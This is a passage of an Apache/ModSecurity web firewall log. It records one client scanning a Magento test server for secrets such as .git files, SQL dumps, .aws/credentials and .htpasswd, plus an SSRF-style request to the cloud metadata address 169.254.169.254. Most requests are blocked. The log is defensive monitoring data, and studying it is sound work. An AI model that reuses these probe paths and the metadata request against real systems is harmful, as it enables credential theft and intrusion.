[Sun Mar 15 10:46:54.137782 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "abaADmAJ710PJa37ZB3yWwAAAAM"]
[Sun Mar 15 10:46:54.138146 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "abaADmAJ710PJa37ZB3yWwAAAAM"]
[Sun Mar 15 10:46:54.138263 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "abaADmAJ710PJa37ZB3yWwAAAAM"]
[Sun Mar 15 10:46:54.411596 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Pattern match "^(?i:file|ftps?|https?):\\\\/\\\\/(?:\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/usr/share/modsecurity-crs/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "54"] [id "931100"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "autumnus.test.indacotrentino.com"] [uri "/test"] [unique_id "abaADmAJ710PJa37ZB3yZwAAAAM"]
[Sun Mar 15 10:46:54.411896 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/test"] [unique_id "abaADmAJ710PJa37ZB3yZwAAAAM"]
[Sun Mar 15 10:46:54.412017 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/test"] [unique_id "abaADmAJ710PJa37ZB3yZwAAAAM"]
[Sun Mar 15 10:46:54.456887 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/backup.sql"] [unique_id "abaADmAJ710PJa37ZB3yaQAAAAM"]
[Sun Mar 15 10:46:54.457288 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/backup.sql"] [unique_id "abaADmAJ710PJa37ZB3yaQAAAAM"]
[Sun Mar 15 10:46:54.457416 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/backup.sql"] [unique_id "abaADmAJ710PJa37ZB3yaQAAAAM"]
[Sun Mar 15 10:46:54.479359 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/awc_prod.sql"] [unique_id "abaADmAJ710PJa37ZB3yagAAAAM"]
[Sun Mar 15 10:46:54.479756 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/awc_prod.sql"] [unique_id "abaADmAJ710PJa37ZB3yagAAAAM"]
[Sun Mar 15 10:46:54.479879 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/awc_prod.sql"] [unique_id "abaADmAJ710PJa37ZB3yagAAAAM"]
[Sun Mar 15 10:46:54.501908 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.AWS/credentials"] [unique_id "abaADmAJ710PJa37ZB3yawAAAAM"]
[Sun Mar 15 10:46:54.502105 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.AWS/credentials"] [unique_id "abaADmAJ710PJa37ZB3yawAAAAM"]
[Sun Mar 15 10:46:54.502224 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.AWS/credentials"] [unique_id "abaADmAJ710PJa37ZB3yawAAAAM"]
[Sun Mar 15 10:46:54.661220 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "abaADmAJ710PJa37ZB3ycgAAAAM"]
[Sun Mar 15 10:46:54.661394 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "abaADmAJ710PJa37ZB3ycgAAAAM"]
[Sun Mar 15 10:46:54.661512 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "abaADmAJ710PJa37ZB3ycgAAAAM"]
[Sun Mar 15 10:46:54.683595 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "abaADmAJ710PJa37ZB3ycwAAAAM"]
[Sun Mar 15 10:46:54.683765 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "abaADmAJ710PJa37ZB3ycwAAAAM"]
[Sun Mar 15 10:46:54.683883 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "abaADmAJ710PJa37ZB3ycwAAAAM"]
[Sun Mar 15 10:46:54.706673 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/index"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/index"] [unique_id "abaADmAJ710PJa37ZB3ydAAAAAM"]
[Sun Mar 15 10:46:54.706841 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/index"] [unique_id "abaADmAJ710PJa37ZB3ydAAAAAM"]
[Sun Mar 15 10:46:54.706957 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/index"] [unique_id "abaADmAJ710PJa37ZB3ydAAAAAM"]
[Sun Mar 15 10:46:54.729005 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/logs/HEAD"] [unique_id "abaADmAJ710PJa37ZB3ydQAAAAM"]
[Sun Mar 15 10:46:54.729178 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/logs/HEAD"] [unique_id "abaADmAJ710PJa37ZB3ydQAAAAM"]
[Sun Mar 15 10:46:54.729294 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/logs/HEAD"] [unique_id "abaADmAJ710PJa37ZB3ydQAAAAM"]
[Sun Mar 15 10:46:54.774204 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.svn/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.svn/ found within REQUEST_FILENAME: /.svn/entries"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.svn/entries"] [unique_id "abaADmAJ710PJa37ZB3ydwAAAAM"]
[Sun Mar 15 10:46:54.774379 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.svn/entries"] [unique_id "abaADmAJ710PJa37ZB3ydwAAAAM"]
[Sun Mar 15 10:46:54.774493 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.svn/entries"] [unique_id "abaADmAJ710PJa37ZB3ydwAAAAM"]
[Sun Mar 15 10:46:54.819848 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "abaADmAJ710PJa37ZB3yeQAAAAM"]
[Sun Mar 15 10:46:54.820021 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "abaADmAJ710PJa37ZB3yeQAAAAM"]
[Sun Mar 15 10:46:54.820137 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "abaADmAJ710PJa37ZB3yeQAAAAM"]
[Sun Mar 15 10:46:54.841754 2026] [authz_core:error] [pid 2708247] [client 185.177.72.49:29874] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/.htaccess
[Sun Mar 15 10:46:54.863564 2026] [authz_core:error] [pid 2708247] [client 185.177.72.49:29874] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/.htpasswd
[Sun Mar 15 10:46:54.953674 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/db.sql"] [unique_id "abaADmAJ710PJa37ZB3yfwAAAAM"]
[Sun Mar 15 10:46:54.954047 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/db.sql"] [unique_id "abaADmAJ710PJa37ZB3yfwAAAAM"]
[Sun Mar 15 10:46:54.954167 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/db.sql"] [unique_id "abaADmAJ710PJa37ZB3yfwAAAAM"]
[Sun Mar 15 10:46:54.976035 2026] [:error] [pid 2708247] [client 185.177.72.49:29874] [client 185.177.72.49] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag 